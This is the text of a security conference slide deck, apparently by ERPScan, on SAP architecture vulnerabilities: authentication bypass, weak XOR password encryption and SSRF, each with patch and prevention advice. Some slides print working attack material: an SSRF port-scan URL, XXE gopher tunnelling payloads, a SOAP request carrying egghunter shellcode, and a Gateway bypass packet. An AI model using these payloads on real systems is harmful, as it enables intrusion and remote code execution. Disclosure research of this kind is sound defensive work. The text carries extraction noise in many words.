Invest in security to secure investments Architecture vulnerabili/es in SAP pla4orms: History and future trends. Alexander Polyakov, CTO, ERPScan Dmitry Evdokimov, Principal Researcher, ERPScan 1
Invest in security to secure investments
Architecture vulnerabili/es in SAP pla4orms: History and future trends.
Alexander Polyakov, CTO, ERPScan Dmitry Evdokimov, Principal Researcher, ERPScan
1
About ERPScan
• The only 360-‐degree SAP Security solu8on -‐ ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP ( 150+ ) • 60+ presenta/ons key security conferences worldwide • 25 Awards and nomina/ons • Research team -‐ 20 experts with experience in different areas
of security • Headquarters in Palo Alto (US) and Amsterdam (EU)
2
SAP
• The most popular business applica8on • More than 185000 customers • 74% of Forbes 500
3
Agenda
• Intro – The history of SAP security – Trends – Common SAP issues
• Architecture problems and uncommon issues • Advice for developers and future trends • Conclusion
4
5
3 areas of SAP Security
2010 Applica3on pla4orm security
Prevents unauthorized access both insiders and remote a3ackers
Solu8on: Vulnerability Assessment and Monitoring
2008
ABAP Code security Prevents a3acks or mistakes made by developers Solu8on: Code audit
2002
Business logic security (SOD) Prevents a3acks or mistakes made Solu8on: GRC
Talks about SAP security
0
5
10
15
20
25
30
35
2006 2007 2008 2009 2010 2011 2012
Most popular: • BlackHat • HITB • Troopers • RSA • Source • DeepSec • etc.
6
SAP Security notes
0
100
200
300
400
500
600
700
800
900
2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012
By October 2012, more than 2500 notes
7
Business Risks
Espionage • Stealing financial informa8on • Stealing corporate secrets • Stealing suppliers and customers list • Stealing HR data Sabotage • Denial of service • Modifica8on of financial reports • Access to technology network (SCADA) by trust rela8ons Fraud • False transac8ons • Modifica8on of master data • Etc.
8
SAP vulnerabili/es by type
0 50 100 150 200 250 300 350
12 -‐SQL Inj
11 -‐ BOF
10 -‐ Denial of service
9 -‐ Remote Code Execu8on
8 -‐ Verb tampering
7 -‐ Code injec8on vulnerability
6 -‐ Hard-‐coded creden8als
5 -‐ Unauthorized usage of applica8on
4 -‐ Informa8on Disclosure
3 -‐ Missing Auth check
2 -‐ XSS/Unauthorised modifica8on of
1 -‐ Directory Traversal
Stats from : • 1Q 2012 • 1Q 2010 • 4Q 2009
But what about the other 20%?
9
Architecture and unusual issues
Authen/ca/on Bypass 1. Verb tampering 2. Invoker servlet Encryp/on 3. Storage – SAPGUI 4. Authen8ca8on – P4 5. Transfer – RFC, Diag SSRF 6. Port Scan 7. Command execu8on 8. Security bypass
10
Authen/ca/on
11
ex1. Invoker Servlet: Descrip/on
• Rapidly calls servlets by their class name
• Published by SAP in their security guides
• Possible to call any servlet from an applica8on
• Even if it is not declared in WEB.XML
Can be used for authen/ca/on bypass
12
ex1. Invoker Servlet: Details
<servlet> <servlet-‐name>Cri8calAc8on</servlet-‐name> <servlet-‐class>com.sap.admin.Cri8cal.Ac8on</servlet-‐class> </servlet> <servlet-‐mapping> <servlet-‐name>Cri8calAc8on</</servlet-‐name> <url-‐paiern>/admin/cri8cal</url-‐paiern> </servlet-‐mapping <security-‐constraint> <web-‐resource-‐collec8on> <web-‐resource-‐name>Restrictedaccess</web-‐resource-‐name> <url-‐paiern>/admin/*</url-‐paiern> <hip-‐method>GET</hip-‐method> </web-‐resource-‐collec8on> <auth-‐constraint> <role-‐name>admin</role-‐name> </auth-‐constraint> </security-‐constraint>
What if we call /servlet/com.sap.admin.Cri/cal.Ac/on
13
ex1. Invoker servlet: Preven/on
For users: • Update to the latest patch 1467771, 1445998 • “EnableInvokerServletGlobally” must be “false” • Check all WEB.XML files
- with free ERPScan WEBXML checker - manually
For developers: • Follow “Security by default” prac8ce
14
2. VERB Tampering
15
ex2. Verb Tampering
<security-‐constraint> <web-‐resource-‐collec8on> <web-‐resource-‐name>Restrictedaccess</web-‐resource-‐name> <url-‐paiern>/admin/*</url-‐paiern> <hip-‐method>GET</hip-‐method> </web-‐resource-‐collec8on> <auth-‐constraint> <role-‐name>admin</role-‐name> </auth-‐constraint> </security-‐constraint>
What if we use HEAD instead of GET ?
16
ex2. Verb tampering: Details
• CTC: an interface for managing J2EE engine • Can be accessed remotely • Can run user management ac8ons:
– Add users – Add to groups – Run OS commands – Start/Stop J2EE
Over 40 other components found to be vulnerable
17
ex2. Verb tampering: More details
If patched, can be bypassed by the Invoker servlet!
18
ex2. Verb tampering: Preven/on
For Users: • Install SAP notes 1503579, 1616259 • Install other SAP notes about Verb Tampering • Disable Invoker Servlet • Disable the applica8ons that are not necessary • Check all WEB.XML files
- with free ERPScan WEBXML checker - manually
For Developers: • The issue was known in 2008 and patched in many applica8on servers.
Learn from others’ mistakes.
19
Encryp/on
20
Where it can be used
While authen8ca8ng (example 5)
While transmiqng (example 4)
While storing (example 3)
21
ex3. SAP GUI encryp/on
• SAP FrontEnd can save encrypted passwords in shortcuts • Shortcuts stored in .sap file • This password uses byte-‐XOR algorithm with “secret” key • The key has the same value for every installa8on of SAP GUI • Any password can be decrypted
22
For Users • Disable password storage in GUI For Developers: • Use at least random salt depending on the installa8on • Do not use XOR in the future
ex3. SAP GUI encryp/on: Preven/on
23
ex4. Insecure password encryp/on in P4
But the password is encrypted
By default, data transmiied in cleartext
P4: a protocol used by the Visual Admin app
24
ex4. Insecure password encryp/on in P4
25
ex4. Insecure password encryp/on in P4
/* 87 */ char mask = 43690; /* 88 */ char check = 21845; /* 89 */ char[] result = new char[data.length + 1]; /* */ /* 91 */ for (int i = 0; i < data.length; ++i) { /* 92 */ mask = (char)(mask ^ data[i]); /* 93 */ result[i] = mask; /* */ } /* 95 */ result[data.length] = (char)(mask ^ check); /* */ /* 97 */ return result;
26
ex4. Insecure password encryp/on in P4: Preven/on
For Users: • Use SSL to secure all the data transmiied between server-‐server and server-‐client connec8ons hip://help.sap.com/saphelp_nwpi71/helpdata/de/14/ef2940cbf2195de10000000a1550b0/content.htm
For Developers: • Use known and approved authen8ca8on schemes such as cram md5 (at least, if it is broken, you will not be the one)
27
ex5. Password transmibng (DIAG/RFC)
DIAG – not an encryp8on protocol; also broken
RFC encryp8on – broken in 2007 (XOR)
Were already covered many 8mes
28
ex5. Password transmibng (DIAG/RFC)
For Users: • Use SNC For Developers: • XOR is BAD
29
SSRF
30
SSRF Basics
• We send Packet A to Service A • Service A ini8ates Packet B to service B • The services can be on the same host or on different hosts • We can manipulate some fields of packet B within packet A • Various SSRF aiacks depend on how many fields we can
control on packet B
Packet A
Packet B
31
SSRF at a glance
Secure network
Corporate network
Packet B
• We send Packet A to Service A
• Service A ini8ates Packet B to service B
• The services can be on the same host or on different hosts
• We can manipulate some fields of packet B within packet A
• Various SSRF aiacks depend on how many fields we can control in packet B
32
What can be done by SSRF?
Security bypass (example 8)
Code execu8on (example 7)
Port scanning (example 6)
Let’s look deeper
33
ex6. Remote port scan by SSRF
• It is possible to scan internal network from the Internet • Authen8ca8on is not required • SAP NetWeaver J2EE engine’s ipcpricing is vulnerable
o And at least 3 similar vulnerabili8es in other services
• /ipcpricing/ui/BufferOverview.jsp? • server=172.16.0.13 • & port=31337 • & password= • & dispatcher= • & targetClient= • & view=
34
ex6. Remote port scan with SSRF: Demo
Port closed
HTTP port
SAP port
35
ex7. Code execu/on with SSRF
• DilbertMSG web service • Use Soap XML • For tes8ng purposes • Shipped with SAP PI < 7.1 by default • Accessed without authoriza8on • Patched in SAP Security note 1707494
36
ex7. XXE tunneling Gopher URI scheme
What will happen??
<?xml version="1.0" encoding="ISO-‐8859-‐1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM “gopher://172.16.0.1:3300/
AAAAAAAAA" >]> <foo>&date;</foo>
37
ex7. XXE Tunneling details
Server B (ERP, HR, BW etc.)
Server A (Portal or XI)
192.168.0.1
172.16.0.1
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1 Host: 192.168.0.1:8000 <?xml version="1.0" encoding="ISO-‐8859-‐1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM “gopher://172.16.0.1:3300/AAAAAAAAA" >]> <foo>&date;</foo>
AAAAAAAAA
Port 3300
telnet 172.16.0.1 3300
38
ex7. XXE Tunneling to Buffer Overflow
• A buffer overflow vulnerability found by Virtual Forge in ABAP Kernel (fixed in SAP note 1487330)
• An example of any other vulnerability could be here • Hard to exploit because it requires calling an RFC func8on which
calls Kernel func8on • But even such a complex aiack can be exploited by SSRF
39
ex7. XXE Tunneling to Buffer Overflow (Step 1)
• We exploit it via WEBRFC • Can be fixed by SAP notes: 1394100, 1536640, 1528822,
1453457 • According to our report, WEBRFC is installed in 40% of
NetWeaver ABAP, even on the Internet
40
ex7. XXE Tunneling to Buffer Overflow (Step 2)
• Shellcode size is limited to 255 bytes (name parameter) • As we don’t have direct connec8on to the Internet from the
vulnerable system, we want to use DNS tunneling shellcode to connect back
• But the XML engine saves some XML data in RWX memory • So we can use egghunter • Any shellcode can be uploaded
41
ex7. XXE Tunneling to Buffer Overflow: Packet B
POST /sap/bc/soap/rfc?sap-‐client=000 HTTP/1.1 Authoriza8on: Basic U1FQKjowMjA3NTk3== Host: company.com:80 User-‐Agent: ERPSCAN Pentes8ng tool v 0.2 Content-‐Type: text/xml; charset=u�-‐8 Cookie: sap-‐client=000 Content-‐Length: 2271 <SOAP-‐ENV:Envelope xmlns:SOAP-‐ENV="hip://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-‐ENC="hip://schemas.xmlsoap.org/soap/
encoding/" xmlns:xsi="hip://www.w3.org/2001/XMLSchema-‐instance" xmlns:xsd="hip://www.w3.org/2001/XMLSchema"><SOAP-‐ENV:Body><m:RSPO_R_SAPGPARAM xmlns:m="urn:sap-‐com:document:sap:rfc:func8ons"><HEAP_EGG>dsecdsechff�4diFkDwj02Dwk0D7AuEE4y4O3f2s3a064M7n2M0e0P2N5k054N4r4n0G4z3c4M3O4o8M4q0F3417005O1n7L3m0Z0O0J4l8O0j0y7L5m3E2r0b0m0E1O4w0Z3z3B4Z0r2H3b3G7m8n0p3B1N1m4Q8P4s2K4W4C8L3v3U3h5O0t3B3h3i3Z7k0a0q3D0F0p4k2H3l0n3h5L0u7k3P2p0018058N0a3q1K8L4Q2m1O0D8K3R0H2v0c8m5p2t5o4z0K3r7o0S4s0s3y4y3Z5p0Y5K0c053q5M0h3q4t3B0d0D3n4N0G3p082L4s1K5o3q012s4z2H0y1k4C0B153X3j0G4n2J0X0W7o3K2Z260j2N4j0x2q2H4S0w030g323h3i127N165n3Z0W4N390Y2q4z4o2o3r0U3t2o0a3p4o3T0x4k315N3i0I3q164I0Q0p8O3A07040M0A3u4P3A7p3B2t058n3Q02VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJE5I4N3V6340065M2Z6M1R112NOK066N5G4Z0C5J425J3N8N8M5AML4D17015OKN7M3X0Z1K0J388N0Z1N0MOL3B621S1Q1T1O5GKK3JJO4P1E0X423GMMNO6P3B141M4Q3A5C7N4W4C8M9R3U485HK03B49499J2Z0V1F3EML0QJK2O482N494M1D173Q110018049N7J401K9L9X101O0N3Z450J161T5M90649U4ZMM3S9Y1C5C1C9Y3S3Z300Y5K1X2D9P4M6M9T5D3B1T0D9N4O0M3T082L5D2KOO9V0J0W5J2H1N7Z4D62LO3H9O1FJN7M0Y1PMO3J0G2I1ZLO3D0X612O4T2C010G353948137O074X4V0W4O5Z68615JJOLO9R0T9ULO1V8K384E1HJK305N44KP9RKK4I0Q6P3U3J2F032J0A9W4S4Q2A9U69659R4A06aaaaaaaaaaaaaaaaaaaaa</HEAP_EGG><NAME>ºÿÿÎ<fÊÿBRjCXÍ.<Ztï¸dsec‹ú¯uê¯uçÿ琐AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAž¾«DSEC^ü1+ÔSò�:G�ú/9LÿT���â_�@���a}Xs§quڝ�€E�RYëë†Æ�ÿÿéMÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</NAME></m:RSPO_R_SAPGPARAM></SOAP-‐ENV:Body></SOAP-‐ENV:Envelope>
42
ex7. XXE Tunneling to Buffer Overflow (Step 3)
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1 Host: sapserver.com:80 Content-‐Length: 7730 <?xml version="1.0" encoding="ISO-‐8859-‐1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM “gopher://[Urlencoded Packet B]" >]> <foo>&date;</foo>
Packet A
• Next step is to pack this packet B into Packet A • We need to insert non-‐printable symbols • God bless gopher; it supports urlencode like HTTP • It will also help us evade aiack against IDS systems
43
ex10. XXE Tunneling to Buffer Overflow: Final step
Server B in DMZ (SAP ERP)
Server A on the Internet (SAP XI)
hip://company.com
172.16.0.1
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1 Host: sapserver.com:80 <?xml version="1.0" encoding="ISO-‐8859-‐1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM “gopher://[packetB]" >]> <foo>&date;</foo>
Port 8000 WebRFC service
Packet B
Shellcode service with DNS payload
Packet C – Command and Control response to avacker by DNS protocol which is allowed for outband connec/ons
44
Full control over the internal system through the Internet
45
ex8. SSRF to Security bypass: SAP Gateway
• SAP Gateway: remote management of SAP • Different aiacks are possible like registering fake RFC service • Currently, secured by the gw/monitor op8on:
0: No monitor commands are accepted 1: Only monitor commands from the local gateway monitor are accepted 2: Monitor commands from local and remote monitors are accepted
• With XXE Tunneling, we can act like a local monitor bypassing restric8ons
• For example, we can change SAP Gateway parameters
46
SAP Gateway server security bypass: Exploit
Message Server vulnerable as well
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1 Host: 172.16.10.63:8001 Content-‐Length: 621 <?xml version="1.0" encoding="UTF-‐8"?><!DOCTYPE in [<!ENTITY li SYSTEM
"gopher://172.16.0.1:3301/a%00%00%00%7A%43%4F%4E%54%00%02%00%7A%67%77%2F%6D%61%78%5F%73%6C%65%65%70%00%00%00%00%79%02%00%00%00%00%00%00%28%DE%D9%00%79%5F%00%74%08%B5%38%7C%00%00%00%00%44%DE%D9%00%00%00%00%00%00%00%00%00%70%DE%D9%00%00%00%00%00%EA%1E%43%00%08%38%38%00%00%00%00%00%10%44%59%00%18%44%59%00%00%00%00%00%64%DE%D9%00%79%5F%00%74%08%B5%38%7C%00%00%00%00%79%DE%D9%00%00%00%00%7A%DE%D9%00%B3%56%35%7C%48%EF%38%7C%5F%57%35%7C%0A%00%00%00%B8%EE">]><dmsg:generate xmlns:dmsg='hip://sap.com/fun/dilbert/msg' 8tle='&li;'>1</dmsg:generate>
47
SSRF: Preven/on
For Users: • Disable unnecessary applica8ons (such as XML interfaces) • Install SAP notes: 1548548, 1545883, 1503856, 948851, 1545883 • Don’t rely on firewalls only For Developers: • Take care not only about input data but also about output data • Filters must be in every place where it is possible to call remote systems • Don’t trust localhost
48
Advice for SAP
49
Some other cases
New technologies = new risks (for Developers)
Double patches (for Remedia8on Team)
Unusual places for known vulnerabili8es (for QA)
50
Unusual XSS in BAPI (for QA)
• SAP BAPI transac8on fails to sani8ze input properly • Possible to inject JavaScript code • No cookies, but we can make a link to a fake SMB server • SAP GUI clients usually use Windows • Windows creden8als will be transferred to aiacker’s host
51
Unusual XSS in BAPI
52
Unusual XSS in BAPI: Preven/on
For Users • Apply patches 1569550 For Developers: • XSS is not only about cookie stealing • In SAP, well-‐known old things can appear in an unusual way
53
Double patches (for Remedia/on)
There were some patches that failed to solve the problem in full
• TH_GREP – patched on Linux but not on Windows – It doesn’t maier if it is more or less possible to exploit – Patch it carefully
• Portal Directory traversal – Directory traversal is not about filtering ../ – The idea is that UNAUTHORIZED ACCESS should be prevented
• Mul/ple XSS in one script – Some8mes, there are patches for one parameter but not for the others – A very bad situa8on when informa8on about patched parameter goes
public
54
New technologies = new risks (For Developers)
• SAP is buying many systems – Their security tes8ng processes may be different or there can be no
processes
• SAP is inves8ng in new technologies and areas – Cloud – Mobile – In-‐Memory
• There can be new security issues in those areas, not known before.
55
Conclusion
It is possible to protect yourself from these kinds of issues and we are working close with SAP to keep the customers secure
SAP Guides
It’s all in your hands
Regular security assessments
ABAP Code review
Monitoring technical security
Segrega/on of Du/es
56
Future work
Many of the researched issues cannot be disclosed now because of our good rela8onship with SAP Security Response Team, whom I would like to thank for coopera8on. However, if you want to be
the first who will see new aiacks and demos, follow us at @erpscan and aiend future presenta8ons:
• 2–3 November – HashDays (Switzerland, Lucerne) • 9 November – POC (Korea, Seul) • 20 November – ZeroNights (Russia, Moscow) • 29 November – DeepSEC (Austria, Vienna)
57
Thanks to all our crew who helped in this research: Dmitry Chastukhin, Dmitriy Evdokimov, Alexey Sintsov, Alexey Tyurin, Pavel Kuzmin, Evgeny Neyolov, Nikolay Mescherin, Alexander Minozhenko.
58